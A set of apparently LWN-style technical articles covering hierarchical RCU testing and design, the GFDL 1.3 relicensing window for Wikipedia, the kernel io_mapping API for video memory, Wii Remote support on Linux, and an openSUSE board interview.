All test cases specify the following configuration parameters in order
to run rcutorture and so that CONFIG_HOTPLUG_CPU=n actually
takes effect:


The 15 test cases are as follows:


	Force single-node “tree” for small systems:
	
	Force two-level tree for large systems:
	
	Force three-level tree for huge systems:
	
	Test autobalancing to a balanced tree:
	
	Test unbalanced tree:
	
	Disable CPU-stall detection:
	
	Disable CPU-stall detection and dyntick idle mode:
	
	Disable CPU-stall detection and CPU hotplug:
	
	Disable CPU-stall detection, dyntick idle mode, and CPU hotplug:
	
	Disable SMP, CPU-stall detection, dyntick idle mode, and CPU hotplug:
	
	This combination located a number of compiler warnings.
	Disable SMP and CPU hotplug:
	
	Test Classic RCU with dynticks idle but without preemption:
	
	Test Classic RCU with preemption but without dynticks idle:
	
	Test Preemptable RCU with dynticks idle:
	
	Test Preemptable RCU without dynticks idle:
	

For a large change that affects RCU core code, one should run
rcutorture for each of the above combinations, and concurrently
with CPU offlining and onlining for cases with
CONFIG_HOTPLUG_CPU.
For small changes, it may suffice to run kernbench in each case.
Of course, if the change is confined to a particular subset of
the configuration parameters, it may be possible to reduce the
number of test cases.

Torturing software: the Geneva Convention does not (yet) prohibit
it, and I strongly recommend it!!!

Conclusion
This hierarchical implementation of RCU reduces lock contention
and avoids unnecessarily awakening dyntick-idle sleeping CPUs, while
also helping to debug Linux's hotplug-CPU code paths.
This implementation is designed to handle single systems with
thousands of CPUs, and on 64-bit systems has an architectural
limitation of a quarter million CPUs, a limit I expect to be
sufficient for at least the next few years.

This RCU implementation of course has some limitations:


	The force_quiescent_state() function can scan the full
	set of CPUs with irqs disabled.
	This would be fatal in a real-time implementation of RCU,
	so if hierarchy ever needs to be introduced to preemptable
	RCU, some other approach will be required.
	It is possible that it will be problematic on 4,096-CPU
	systems, but actual testing on such systems is required
	to prove this one way or the other.
	
	On busy systems, the force_quiescent_state() scan
	would not be expected to happen,
	as CPUs should pass through quiescent states within three
	jiffies of the start of a grace period.  On semi-busy
	systems, only the CPUs in dynticks-idle mode throughout would
	need to be scanned.
	In some cases, for example when a dynticks-idle CPU is handling
	an interrupt during a scan, subsequent scans are required.
	However, each such scan is performed separately, so scheduling
	latency is degraded by the overhead of only one such scan.
	
	If this scan proves problematic, one straightforward solution
	would be to do the scan incrementally.
	This would increase code complexity slightly and would also
	increase the time required to end a grace period, but would
	nonetheless be a likely solution.
	
	The rcu_node hierarchy is created at compile
	time, and is therefore sized for the worst-case NR_CPUS
	number of CPUs.
	However, even for 4,096 CPUs, the rcu_node
	hierarchy consumes only 65 cache lines on a 64-bit machine
	(and just you try accommodating 4,096 CPUs on a 32-bit machine!).
	Of course, a kernel built with NR_CPUS=4096
	running on a 16-CPU machine would use a two-level tree when
	a single-node tree would work just fine.
	Although this configuration would incur added locking overhead,
	this does not affect hot-path read-side code, so should not be a
	problem in practice.
	
	This patch does increase kernel text and data somewhat:
	the old Classic RCU implementation consumes 1,757 bytes of
	kernel text and 456 bytes of kernel data for a total of 2,213 bytes,
	while the new hierarchical RCU implementation consumes 4,006
	bytes of kernel text and 624 bytes of kernel data for a total
	of 4,630 bytes on an NR_CPUS=4 system.
	This is a non-problem even for most embedded systems, which
	often come with hundreds of megabytes of main memory.
	However, if this is a problem for tiny embedded systems, it may
	be necessary to provide both “scale up” and
	“scale down” implementations of RCU.

This hierarchical RCU implementation should nevertheless be a vast
improvement over Classic RCU for machines with hundreds of CPUs.
After all, Classic RCU was designed for systems with only 16-32 CPUs.

At some point, it may be necessary to also apply hierarchy to the
preemptable RCU implementation.
This will be challenging due to the modular arithmetic used on the
per-CPU counter pairs, but should be doable.

Acknowledgements
I am indebted to Manfred Spraul for ideas, review comments,
bugs spotted, as well as some good healthy competition,
to Josh Triplett, Ingo Molnar, Peter Zijlstra, Mathieu Desnoyers,
Lai Jiangshan, Andi Kleen, Andy Whitcroft, Gautham Shenoy,
and Andrew Morton for review comments,
and to Thomas Gleixner for much help with timer issues.
I am thankful to Jon M. Tollefson, Tim Pepper, Andrew Theurer,
Jose R. Santos, Andy Whitcroft, Darrick Wong, Nishanth Aravamudan, Anton
Blanchard, and Nathan Lynch for keeping machines alive despite
my (ab)use for this project.
We all owe thanks to Peter Zijlstra, Gautham Shenoy, Lai Jiangshan,
and Manfred Spraul for helping (in some cases unwittingly) render
this document at least partially human readable.
Finally, I am grateful to Kathy Bennett for her support of this effort.

This work represents the view of the authors and does not necessarily
represent the view of IBM.

Linux is a registered trademark of Linus Torvalds.

Other company, product, and service names may be trademarks or
service marks of others.


Answers to Quick Quizzes
Quick Quiz 1:
Wait a minute!  With all those new locks, how do you avoid deadlock?

Answer:
Deadlock is avoided by never holding more than one of the
rcu_node structures' locks at a given time.
This algorithm uses two more locks, one to prevent CPU hotplug operations
from running concurrently with grace-period advancement
(onofflock) and another
to permit only one CPU at a time to force a quiescent state
to end quickly (fqslock).
These are subject to a locking hierarchy, so that
fqslock must be acquired before
onofflock, which in turn must be acquired before
any of the rcu_node structures' locks.

Also, as a practical matter, refusing to ever hold more than
one of the rcu_node locks means that it is unnecessary
to track which ones are held.
Such tracking would be painful as well as unnecessary.

Quick Quiz 2:
Why stop at a 64-times reduction?
Why not go for a few orders of magnitude instead?

Answer: RCU works with no problems on
systems with a few hundred CPUs, so allowing 64 CPUs to contend on
a single lock leaves plenty of headroom.
Keep in mind that these locks are acquired quite rarely, as each
CPU will check in about one time per grace period, and grace periods
extend for milliseconds.

Quick Quiz 3:
But I don't care about McKenney's lame excuses in the answer to
Quick Quiz 2!!!
I want to get the number of CPUs contending on a single lock down
to something reasonable, like sixteen or so!!!

Answer:
OK, have it your way, then!!!
Set CONFIG_RCU_FANOUT=16 and (for NR_CPUS=4096)
you will get a
three-level hierarchy with 256 rcu_node structures
at the lowest level, 16 rcu_node structures as intermediate
nodes, and a single root-level rcu_node.
The penalty you will pay is that more rcu_node structures
will need to be scanned when checking to see which CPUs need help
completing their quiescent states (256 instead of only 64).
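
The node counts quoted in this answer can be checked with a few lines of
user-space C.
The function rcu_node_count() is a hypothetical helper written for this
sketch; it simply divides by the fanout, rounding up, until a single root
remains, which is an assumption about how the tree is shaped rather than
a copy of the kernel's compile-time macros.

```c
#include <assert.h>
#include <stddef.h>

static unsigned long div_round_up(unsigned long n, unsigned long d)
{
	return (n + d - 1) / d;
}

/*
 * Total number of rcu_node structures needed for nr_cpus CPUs with the
 * given fanout.  If levels is non-NULL, the tree depth is stored there.
 */
static unsigned long rcu_node_count(unsigned long nr_cpus,
				    unsigned long fanout, int *levels)
{
	unsigned long n, total;
	int depth = 1;

	assert(nr_cpus >= 1 && fanout >= 2);
	n = div_round_up(nr_cpus, fanout);      /* leaf-level nodes */
	total = n;
	while (n > 1) {
		n = div_round_up(n, fanout);    /* next level up */
		total += n;
		depth++;
	}
	if (levels != NULL)
		*levels = depth;
	return total;
}
```

With NR_CPUS=4096, a fanout of 64 yields 64 leaves plus a root, for the 65
structures mentioned in the conclusion, while a fanout of 16 yields
256 + 16 + 1 = 273 structures in three levels.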

Quick Quiz 4:
OK, so what is the story with the colors?

Answer:
Data structures analogous to rcu_state (including
rcu_ctrlblk) are yellow,
those containing the bitmaps used to determine when CPUs have checked
in are pink,
and the per-CPU rcu_data structures are blue.
Later on, we will see that data structures used to conserve energy
(such as rcu_dynticks) will be green.

Quick Quiz 5:
Given such an egregious bug, why does Linux run at all?

Answer:
Because the Linux kernel contains device drivers that are (relatively)
well behaved.
Few if any of them spin in RCU read-side critical sections for the
many milliseconds that would be required to provoke this bug.
The bug nevertheless does need to be fixed, and this variant of
RCU does fix it.

Quick Quiz 6:
But what happens if a CPU tries to report going through a quiescent
state (by clearing its bit) before the bit-setting CPU has finished?

Answer:
There are three cases to consider here:


	A CPU corresponding to a not-yet-initialized leaf rcu_node
	structure tries to report a quiescent state.
	This CPU will see its bit already cleared, so will give up on
	reporting its quiescent state.
	Some later quiescent state will serve for the new grace period.

	A CPU corresponding to a leaf rcu_node structure that
	is currently being initialized tries to report a quiescent state.
	This CPU will see that the rcu_node structure's
	->lock is held, so will spin until it is
	released.
	But once the lock is released, the rcu_node
	structure will have been initialized, reducing to the
	following case.

	A CPU corresponding to a leaf rcu_node that has
	already been initialized tries to report a quiescent state.
	This CPU will find its bit set, and will therefore clear it.
	If it is the last CPU for that leaf node, it will
	move up to the next level of the hierarchy.
	However, this CPU cannot possibly be the last CPU in the system to
	report a quiescent state, given that the CPU doing the initialization
	cannot yet have checked in.

So, in all three cases, the potential race is resolved correctly.

Quick Quiz 7:
And what happens if all CPUs try to report going through a quiescent
state before the bit-setting CPU has finished, thus ending the new
grace period before it starts?

Answer:
The bit-setting CPU cannot pass through a
quiescent state during initialization, as it has irqs disabled.
Its bits therefore remain non-zero, preventing the grace period from
ending until the data structure has been fully initialized.

Quick Quiz 8:
And what happens if one CPU comes out of dyntick-idle mode and then
passes through a quiescent state just as another CPU notices that the
first CPU was in dyntick-idle mode?
Couldn't they both attempt to report a quiescent state at the same
time, resulting in confusion?

Answer:
They will both attempt to acquire the lock on the same leaf
rcu_node structure.
The first one to acquire the lock will report the quiescent state
and clear the appropriate bit, and the second one to acquire the
lock will see that this bit has already been cleared.

Quick Quiz 9:
But what if all the CPUs end up in dyntick-idle mode?
Wouldn't that prevent the current RCU grace period from ever ending?

Answer:
Indeed it will!
However, CPUs that have RCU callbacks are not permitted to enter
dyntick-idle mode, so the only way that all the CPUs could
possibly end up in dyntick-idle mode would be if there were
absolutely no RCU callbacks in the system.
And if there are no RCU callbacks in the system, then there is no
need for the RCU grace period to end.
In fact, there is no need for the RCU grace period to even start.

RCU will restart if some irq handler does a call_rcu(),
which will cause an RCU callback to appear on the corresponding CPU,
which will force that CPU out of dyntick-idle mode, which will in turn
permit the current RCU grace period to come to an end.

Quick Quiz 10:
Given that force_quiescent_state() is a two-phase state
machine, don't we have double the scheduling latency due to scanning
all the CPUs?

Answer:
Ah, but the two phases will not execute back-to-back on the same CPU.
Therefore, the scheduling-latency hit of the two-phase algorithm is no
different than that of a single-phase algorithm.
If the scheduling latency becomes a problem, one approach would be to
recode the state machine to scan the CPUs incrementally.
But first show me a problem in the real world, then
I will consider fixing it!

Quick Quiz 11:
But the other reason to hold ->onofflock is to prevent
multiple concurrent online/offline operations, right?

Answer:
Actually, no!
The CPU-hotplug code's synchronization design prevents multiple
concurrent CPU online/offline operations, so only one CPU online/offline
operation can be executing at any given time.
Therefore, the only purpose of ->onofflock is to prevent a CPU
online or offline operation from running concurrently with grace-period
initialization.

Quick Quiz 12:
Given all these acquisitions of the global ->onofflock,
won't there
be horrible lock contention when running with thousands of CPUs?

Answer:
Actually, there can be only three acquisitions of this lock per grace
period, and each grace period lasts many milliseconds.
One of the acquisitions is by the CPU initializing for the current
grace period, and the other two are by CPUs onlining and offlining some CPU.
These latter two cannot run concurrently due to the CPU-hotplug
locking, so at most two CPUs can be contending for this lock at any
given time.

Lock contention on ->onofflock should therefore
be no problem, even on systems with thousands of CPUs.


		GFDL 1.3: Wikipedia's exit permit


Wikipedia is one of the preeminent
examples of what can be done in an open setting; it has, over the years,
accumulated millions of articles - many of them excellent - in a large
number of languages.  Wikipedia also has a bit of a licensing problem,
but it would appear that recent events, including the release of a
new license by the Free Software Foundation, offer a way out.


Wikipedia is licensed under the GNU Free Documentation License (GFDL).  The
GFDL has been covered here a number of times; it is, to put it mildly, a
controversial document.  Its anti-DRM provisions are sufficiently broad
that, by some people's interpretation, a simple "chmod -r" on
a GFDL-licensed file is a violation.  But the biggest complaint has to do
with the GFDL's notion of "invariant sections."  These sections must be
propagated unchanged with any copy (or derived work) of the original
document.  The GFDL itself must also be included with any copies.  So a
one-page excerpt from the GNU Emacs manual, for example, must be
accompanied by several dozen pages of material, including the original GNU
Manifesto.

So the GFDL has come to be seen by many as more of a tool for the
propagation of FSF propaganda than a license for truly free documentation.  Much of the
community avoids this license; some groups, such as the Debian Project, see
it as non-free.  Many projects which still do use the GFDL make a clear
point of avoiding (or disallowing outright) the use of cover texts,
invariant sections, and other GFDL features.  Some projects have dropped
the GFDL; in many cases, they have moved to the Creative Commons
attribution-sharealike license which retains the copyleft provisions of the
GFDL without most of the unwanted baggage.


Members of the Wikipedia project have wanted to move away from the GFDL for
some time.  They have a problem, though: like the Linux kernel, Wikipedia
does not require copyright assignments from its contributors.  So any
relicensing of Wikipedia content would require the permission of all the
contributors.  For a project on the scale of Wikipedia, the chances of
simply finding all of the contributors - much less getting them to
agree on a license change - are about zero.  So Wikipedia, it seems, is
stuck with its current license.


There is one exception, though.  The Wikipedia
copyright policy, under which contributions are accepted, reads like
this:


	Permission is granted to copy, distribute and/or modify this
	document under the terms of the GNU Free Documentation License,
	Version 1.2 or any later version published by the Free Software
	Foundation; with no Invariant Sections, with no Front-Cover Texts,
	and with no Back-Cover Texts.


The presence of the "or any later version" language allows Wikipedia
content to be distributed under the terms of later versions of the GFDL
with no need to seek permission from individual contributors.
Surprisingly, the Wikimedia Foundation has managed to get the Free Software
Foundation to cooperate in the use of the "or any later version" permission
to carry out an interesting legal hack.

On November 3, the FSF and the Wikimedia Foundation jointly announced the release of
version 1.3 of the GFDL.  This announcement came as a surprise to
many, who had no idea that a new GFDL 1.x release was in the works.  This
update does not address any of the well-known complaints against the GFDL.
Instead, it adds a new section:


	An MMC [Massive Multiauthor Collaboration Site] is "eligible for
	relicensing" if it is licensed under this License, and if all works
	that were first published under this License somewhere other than
	this MMC, and subsequently incorporated in whole or in part into
	the MMC, (1) had no cover texts or invariant sections, and (2) were
	thus incorporated prior to November 1, 2008.
	
	The operator of an MMC Site may republish an MMC contained in the
	site under CC-BY-SA on the same site at any time before August 1,
	2009, provided the MMC is eligible for relicensing.


In other words, GFDL-licensed sites like Wikipedia have a special,
nine-month window in which they can relicense their content to the Creative
Commons attribution-sharealike license.  This works because (1) moving
to version 1.3 of the license is allowed under the "or any later
version" terms, and (2) relicensing to CC-BY-SA is allowed by
GFDL 1.3.
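
The conditions in the quoted section reduce to two date checks plus a test for cover texts and invariant sections.  The sketch below is one simplified reading of that text, written in Python; it is not part of the license or of any Wikimedia tooling, and the names ImportedWork, eligible_for_relicensing() and may_republish() are invented for illustration.

```python
from dataclasses import dataclass
from datetime import date

# Dates taken from the GFDL 1.3 text quoted above.
INCORPORATION_CUTOFF = date(2008, 11, 1)   # imports must predate this
RELICENSING_DEADLINE = date(2009, 8, 1)    # republication must predate this


@dataclass
class ImportedWork:
    """A GFDL work first published elsewhere, then added to the site.

    Hypothetical record type; the field names are illustrative only.
    """
    incorporated_on: date
    has_cover_texts: bool = False
    has_invariant_sections: bool = False


def eligible_for_relicensing(site_is_gfdl, imported_works):
    """Return True if the site meets both numbered conditions."""
    if not site_is_gfdl:
        return False
    for work in imported_works:
        if work.has_cover_texts or work.has_invariant_sections:
            return False                      # fails condition (1)
        if work.incorporated_on >= INCORPORATION_CUTOFF:
            return False                      # fails condition (2)
    return True


def may_republish(site_is_gfdl, imported_works, when):
    """Return True if republishing under CC-BY-SA on `when` is allowed."""
    return (when < RELICENSING_DEADLINE
            and eligible_for_relicensing(site_is_gfdl, imported_works))


if __name__ == "__main__":
    early = ImportedWork(incorporated_on=date(2008, 6, 15))
    late = ImportedWork(incorporated_on=date(2008, 11, 3))
    print(may_republish(True, [early], date(2009, 5, 1)))
    print(may_republish(True, [early, late], date(2009, 5, 1)))
    print(may_republish(True, [early], date(2009, 8, 1)))
```

Under this reading, a single outside work incorporated on or after the cutoff date is enough to make the collection containing it ineligible, and nothing can be republished once the deadline has passed.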

Legal codes, like other kinds of code, have a certain tendency to pick up
cruft as they are patched over time.  In this case, the FSF has added a
special, time-limited hack which lets Wikipedia make a graceful exit from
the GFDL license regime.  This move is surprising to many, who would not
have guessed that the FSF would go for it.  Lawrence Lessig, who calls the
change "enormously important," expresses
it this way:


	Richard Stallman deserves enormous credit for enabling this change
	to occur. There were some who said RMS would never permit Wikipedia
	to be relicensed, as it is one of the crown jewels in his movement
	for freedom. And so it is: like the GNU/Linux operation system,
	which his movement made possible, Wikipedia was made possible by
	the architecture of freedom the FDL enabled. One could well
	understand a lesser man finding any number of excuses for blocking
	the change.


For whatever reason, Stallman and the FSF chose to go along with this
change, though not before adding some safeguards.  The November 1
cutoff date (which precedes the GFDL 1.3 announcement) is there to
prevent troublemakers from posting FSF manuals to Wikipedia in their
entirety, and, thus, relicensing them.

Now that Wikipedia has its escape clause, it needs to decide how to
respond.  The plan would appear to be
this:


	Later this month, we will post a re-licensing proposal for all
	Wikimedia wikis which are currently licensed under the GFDL. It
	will be collaboratively developed on meta.wiki and I will announce
	it here.  This re-licensing proposal will include a simplified
	dual-licensing proposition, under which content will continue to be
	indefinitely available under GFDL, except for articles which
	include CC-BY-SA-only additions from external sources. (The terms
	of service, under this proposal, will be modified to require
	dual-licensing permission for any new changes.)


This proposal will be followed by a "community-wide referendum," with a
majority vote deciding whether the new policy will be adopted or not.
Expect some interesting discussions over the next month.

This series of events highlights a couple of important points to keep in
mind when considering copyright and licensing for a project.  There is a
certain simplicity and egalitarianism inherent in allowing contributors to
retain their copyrights.  But it does also limit a project's ability to
recover from a suboptimal license choice later on.  Licensing inflexibility
can be a good thing or a bad thing, depending on your point of view, but it
is certainly something which should be kept in mind.

The other thing to be aware of is just how much power the "or any later
version" text puts into the hands of the FSF.  The license promises that
later versions will be "similar in spirit," but the GPLv3 debate made it
clear that similarity of spirit is in the eye of the beholder.  It is not
immediately obvious that allowing text to be relicensed (to a license
controlled by a completely different organization) is in the "spirit" of
the original GFDL.  Your editor suspects that most contributors will be
willing to accept this change, but there may be some who feel that their
trust was abused.

Finally, it's worth noting that "any later version" includes
GFDL 2.0.  The discussion draft of
this major license upgrade has been available for comments for a full two
years now.  The FSF has not said anything about when it plans to move
forward with the new license, but it seems clear that anybody wanting to
comment on this draft would be well advised to do so soon.

		Large I/O memory in small address spaces


In the good old days, video graphics drivers ran in user space and the
kernel had little to do with video memory.  More recently, graphics
developers have decisively voted for change and, in the process, moved
video memory management into the kernel.  So now the kernel must often
manipulate video memory directly.  And that, as it turns out, is harder
than one might expect - at least, on 32-bit machines if the user actually
cares about reasonable performance.

The problem is that 32-bit machines have a mere 4GB of virtual address
space.  Linux (usually) splits that space in two; the bottom 3GB are given
to user space, while the kernel itself occupies the top 1GB.  Splitting the
space in this way yields an important advantage: there is no need to adjust
the memory management configuration on transitions between kernel and user
space, which speeds things up considerably.  The down side is that the
kernel has to fit in the remaining gigabyte of memory.  That would not seem
like much of a problem, even with contemporary kernels, but remember one
thing: the kernel needs to map physical memory into its address space
before it can do anything with it.  So the amount of virtual address space
given to the kernel limits the amount of physical memory it can manipulate
directly.

One other thing that must fit into the kernel's address space is the
vmalloc() area - a range of addresses which can be assigned on the
fly to create needed mappings in the kernel.  When a virtually-contiguous
range of memory is allocated with vmalloc(), it is mapped in this
range.  Another user of this address space is ioremap(), which
makes a range of I/O memory available to the kernel.

Device drivers typically need access to I/O memory, so they use
ioremap() to map it into the kernel's address space.  Graphics
adapters are a little different, though, in that they have large I/O
memory regions: the entirety of video memory.  Contemporary graphics
adapters can carry a lot of video memory, to the point that mapping it with
ioremap() would require far too much address space, if, indeed, it
fits in there at all.  So a straight ioremap() is not feasible;
life was much easier in the old days when this I/O memory was mapped into
user space instead.
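
The squeeze is easy to quantify.  The sketch below works through the arithmetic in Python; the 3GB/1GB split comes from the text above, while the 128MB size for the vmalloc() area and the sample video memory sizes are assumptions chosen for illustration (128MB is the usual default on 32-bit x86, but it can be changed).

```python
MB = 1024 * 1024
GB = 1024 * MB

VIRTUAL_SPACE = 4 * GB                      # 32-bit virtual address space
USER_SPACE = 3 * GB                         # bottom 3GB, per the text
KERNEL_SPACE = VIRTUAL_SPACE - USER_SPACE   # top 1GB

# Assumption: size of the area shared by vmalloc() and ioremap().
VMALLOC_AREA = 128 * MB


def fits_in_vmalloc_area(video_memory, already_used=0):
    """Return True if a straight ioremap() of all video memory would fit."""
    return video_memory + already_used <= VMALLOC_AREA


def share_of_kernel_space(video_memory):
    """Fraction of the kernel's address space a full mapping would use."""
    return video_memory / KERNEL_SPACE


if __name__ == "__main__":
    for size_mb in (64, 256, 512):          # hypothetical adapters
        size = size_mb * MB
        print(f"{size_mb}MB video memory: "
              f"fits={fits_in_vmalloc_area(size)}, "
              f"{share_of_kernel_space(size):.0%} of kernel space")
```

With these assumed numbers, an adapter carrying 256MB of video memory already exceeds the whole vmalloc() area, and one carrying 512MB would claim half of the kernel's address space if mapped in full.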

The Intel i915 developers, who are the farthest ahead when it comes to
kernel-based GPU memory management, ran into this problem first.  Their
initial solution was to map individual pages as needed with
ioremap() (or, strictly, ioremap_wc(), which turns on
write combining - see this article for more details)
and to unmap them afterward.  This solution works, but it's slow.  Among other things,
an ioremap() operation requires a cross-processor interrupt to be
sure that all CPUs know about the address space change.  It is a function
which was designed to be called infrequently, outside of
performance-critical code.  Making ioremap() calls a part of most
graphical operations is not the way to obtain a satisfactory first-person
shooter experience.

The real solution comes in
the form of a new mapping API developed by Keith Packard (and subsequently
tweaked by Ingo Molnar).  It draws heavily on the fact that Linux has had
to solve this kind of problem before.  Remember that the kernel (on 32-bit
systems) only has 1GB of address space to work with; that is the maximum
amount of physical memory it can ever have directly mapped at any given
time.  Any physical memory above that amount is called "high memory"; it is
normally not mapped into the kernel's address space.  Access to that memory
requires an explicit mapping - using kmap() or
kmap_atomic() - first.  High memory is thus trickier to use, but
this trick has enabled 32-bit systems to support far more memory than was
once thought possible.


The new mapping API draws more than inspiration from the treatment of high
memory - it uses much of the same mechanism as well.  A driver which needs
to map a large I/O area sets up the mapping with a call to:

	struct io_mapping *io_mapping_create_wc(unsigned long base,
	                                        unsigned long size);

This function returns the struct io_mapping pointer, but it does
not actually map any of the I/O memory into the kernel's address space.
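That must be done a page at a time with a call to one of:

	void *io_mapping_map_atomic_wc(struct io_mapping *mapping,
	                               unsigned long offset);
	void *io_mapping_map_wc(struct io_mapping *mapping,
	                        unsigned long offset);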

Either function will return a kernel-space pointer which is mapped to the
page at the given offset.  
The atomic form is essentially a kmap_atomic() call - it uses the
KM_USER0 slot, which is a good thing for developers to know
about.  It is, by far, the faster of the two, but it requires that the
mapping be held by atomic code, and only one page at a time can be mapped
in this way.  Code which might sleep must use
io_mapping_map_wc(), which currently falls back to the old
ioremap_wc() implementation.


Mapped pages should be unmapped when no longer needed, of course:

	void io_mapping_unmap_atomic(void *vaddr);
	void io_mapping_unmap(void *vaddr);

There are some interesting aspects to this implementation.  One is that
struct io_mapping is never actually defined anywhere.  The code
need not remember anything except the base address, so the return value
from io_mapping_create_wc() is just the base pointer
which was passed in.  The other is that all of this structure is really
only needed on 32-bit systems; a 64-bit processor has no trouble finding
enough address space to map video memory.  So, on 64-bit systems,
io_mapping_create_wc() just maps the entire region with
ioremap_wc(); the individual page operations are no-ops.
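
The pattern described above (create a handle cheaply, then map and unmap single pages on demand) can be modeled in a few lines.  What follows is a toy user-space model in Python, not kernel code: the class ToyIoMapping and its methods are invented for illustration, a bytearray stands in for video memory, and a single slot stands in for the one atomic mapping slot.

```python
PAGE_SIZE = 4096


class ToyIoMapping:
    """Toy stand-in for the create / map-one-page / unmap pattern."""

    def __init__(self, io_memory):
        # Like the 32-bit case in the text, creation maps nothing;
        # it only remembers where the region lives.
        self._io_memory = io_memory
        self._atomic_slot = None      # page offset held by the single slot
        self.map_calls = 0

    def map_atomic(self, offset):
        """Map the page containing `offset`; only one may be held."""
        if self._atomic_slot is not None:
            raise RuntimeError("atomic slot already in use")
        page_start = offset - (offset % PAGE_SIZE)
        self._atomic_slot = page_start
        self.map_calls += 1
        # memoryview gives a writable window onto just this page.
        return memoryview(self._io_memory)[page_start:page_start + PAGE_SIZE]

    def unmap_atomic(self, window):
        """Release the window and free the slot for the next mapping."""
        window.release()
        self._atomic_slot = None


def fill(mapping, length, value):
    """Write `value` to `length` bytes, one mapped page at a time."""
    for page_start in range(0, length, PAGE_SIZE):
        window = mapping.map_atomic(page_start)
        count = min(PAGE_SIZE, length - page_start)
        window[:count] = bytes([value]) * count
        mapping.unmap_atomic(window)


if __name__ == "__main__":
    video_memory = bytearray(4 * PAGE_SIZE)
    mapping = ToyIoMapping(video_memory)
    fill(mapping, len(video_memory), 0xFF)
    print(mapping.map_calls, all(b == 0xFF for b in video_memory))
```

The model only captures the shape of the interface: address space is consumed one page at a time, and a second atomic mapping cannot be taken until the first has been released.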

Keith reports that, with this change,
Quake 3 (used for testing purposes only, of course) runs 18 times
faster.  The far more serious Dave Airlie tested with glxgears and got an increase from
85 frames/second to 380.  This is a big enough improvement that they would
like to see this code go into 2.6.28, which will contain the GEM memory
manager code.  Linus responds:


	I'm inclined to agree. Not that I think 380fps sounds very
	impressive (I get 850+ fps with _software_ rendering, for
	chissake), but because 85 fps is a joke, and clearly without this
	setup there's not even any point to try to do any other
	optimizations.


As a result, this code has been merged into the mainline and will appear in
2.6.28-rc4.

		Linux Connectivity for the Wii Remote


Linux has had support for numerous hand-held infrared remote control
devices for many years through the Linux Infra Red Controller
(LIRC) drivers.  There has
been recent work to
include LIRC in the kernel.
The Nintendo Wii Remote
is a more sophisticated remote control that was developed for the Wii
game platform; it is accessible through a collection of
Linux tools called CWiid.
Wikipedia describes the Wii Remote:


The Wii Remote, sometimes nicknamed "Wiimote", is the primary controller for Nintendo's Wii console. A main feature of the Wii Remote is its motion sensing capability, which allows the user to interact with and manipulate items on screen via movement and pointing through the use of accelerometer and optical sensor technology. Another feature is its expandability through the use of attachments.
The Wii Remote was announced at the Tokyo Game Show on September 16, 2005.


The Wiimote hardware capabilities include:

 Two-way wireless Bluetooth connectivity to the host.
 A screen-mounted Sensor Bar with multiple IR light sources and a 5-meter range.
 A built-in IR camera with distance and rotation sensing capabilities.
 A three-axis accelerometer for detecting hand motions.
 Six general-purpose remote control pushbuttons labeled A, -, Home, +, 1 and 2.
 An up-down-left-right four-way pushbutton.
 A power switch.
 Four remote-controlled LEDs.
 A built-in speaker for providing audio effects.
 A "rumble" device for producing vibrations.
 Built-in non-volatile memory with space for user data.
 A hardware expansion port.
 Power from two AA cells; rechargeable types can be used.


CWiid was written by L. Donnie Smith and has been released under the
GPLv2. The project has been around since March, 2007 and is currently
at version 0.6.00.  The
libcwiid API
document explains the CWiid software interface.


There are currently at least twelve
programs using CWiid.
Some of the highlights include
control of DMX
lighting systems with
Wiimote Control,
3D display of chemical structures using the
Avogadro 
molecular editor, the
WiiOSC
control device for music programs and
a newly released 
prototype Wiimote Control for the
Ardour multi-track audio editor.
Although the Wiimote control is ideal for use in games, there
don't appear to be any such developments under Linux at this point.


One of the more interesting uses of the Wiimote is
Head Tracking
for an immersive 3D experience, based on the work of
Johnny Chung Lee.
This approach to 3D visualization produces full-color
displays, unlike the old-fashioned 3D movie technology that uses
glasses with red and green lenses.  Other 3D technologies require
expensive LCD shutters that tend to produce a lot of flicker.
The head tracking 3D technology would be well suited for use by the
physically disabled.


New Wiimote devices can be purchased for $40 or less.
Many of them can be found on the used market, thanks to the popularity of the
Wii platform.
If your favorite application could benefit from a two-way wireless
remote control device with a wide variety of features,
the Wiimote looks like a good choice.


		Interview with the openSUSE board


The openSUSE project recently welcomed
its first community-elected board.  The previous board was appointed by
Novell.  The new board consists
of both Novell employees and non-Novell members of the community.  From the
non-Novell side of the community, Pascal Bleser and Bryen Yunashko were
elected, and from the Novell side, Henne Vogelsang and Federico
Mena-Quintero were elected.  Novell appointed Michael Löffler as chairman
of the board.  We asked the new board a few questions and are pleased to
present their responses.

LWN: There was some discussion in the mailing lists prior to the
election about the definition of a member.  The current definition says:
"'openSUSE Members' are specifically distinguished contributors who have
brought a continued and substantial contribution to the openSUSE project."

Do you agree with this definition?  What is your definition of "continued
and substantial"?


Pascal: We agree with that definition. The only potential issue with
it is the name "Members". We had a long discussion on our opensuse-project
mailing-list (that is open to everyone) about a proper name (and the
process too), but we didn't manage to come up with something less
ambiguous. Fedora's "Ambassador" title wouldn't be too bad, but actually
even more confusing as it is not the same role.  Unfortunately there is
no red line we can cross between "non substantial" and "substantial",
which is why the Board discusses and votes on each membership request.
Typically, membership is granted to individuals who have been
contributing to the community for more than half a year, in domains
such as packaging, translating, authoring content on the Wiki, hacking,
helping out by answering questions or administrating mailing-lists, our
forum, or on IRC, etc...  This is by no means an exhaustive list. We are
looking for verifiable contributions though, and we will discuss how to
proceed for granting Member status in the future, as the current process
doesn't scale that well. Several other options were discussed on our
opensuse-project mailing-list when we initiated the idea.


Bryen: This will always be a continuously evolved definition as we
identify people who contribute to the project as a whole, or in part, in
new ways we might not have thought of previously. Myself, I became a
member for my advocacy for a11y (accessibility through computing) and
encouraging others to think about the needs of people with accessibility
issues. I talked about it, I provided relevant information and I
participated regularly in openSUSE meetings. I see "continued and
substantial contribution" as someone who opens doors to making openSUSE
a more relevant platform for users.


LWN: Does Novell adequately support openSUSE?  Should Novell do more
to support the project?


Henne: Novell is investing a lot in openSUSE. Nearly the whole
technical infrastructure of the project is taken care of by Novell.  Novell
is also putting a lot of manpower and money into the project. But of course
we could always use more, the project is unsatisfiable in that regard. So
is Novell adequately supporting openSUSE?  Yes. Could Novell do more?
Definitely. Should Novell do more: Yes please.


Bryen: One of the things that attracted me to the openSUSE Community
was the active participation of Novell developers within the project.  They
continue to make themselves accessible and over time, they have given the
reins to other people from the community and empowered us all to do more
for the project. While I think Novell could stand to do a bit more
promoting of openSUSE to the general public, I think they've done a fine
job with Community Manager Joe Brockmeier.  In many ways, I think it is
premature to determine whether Novell *needs* to do more. It's only been a
week since the polls closed for our new Board and we've had a good outcome
of voter turnout at 75%.  This makes it the first time that our Board has a
community-backed mandate and a strong one at that. So it isn't a question
of whether they've done enough thus far, but more a question of what more
will they do now that Novell sees how strongly vested Community members are
in the project as stakeholders.


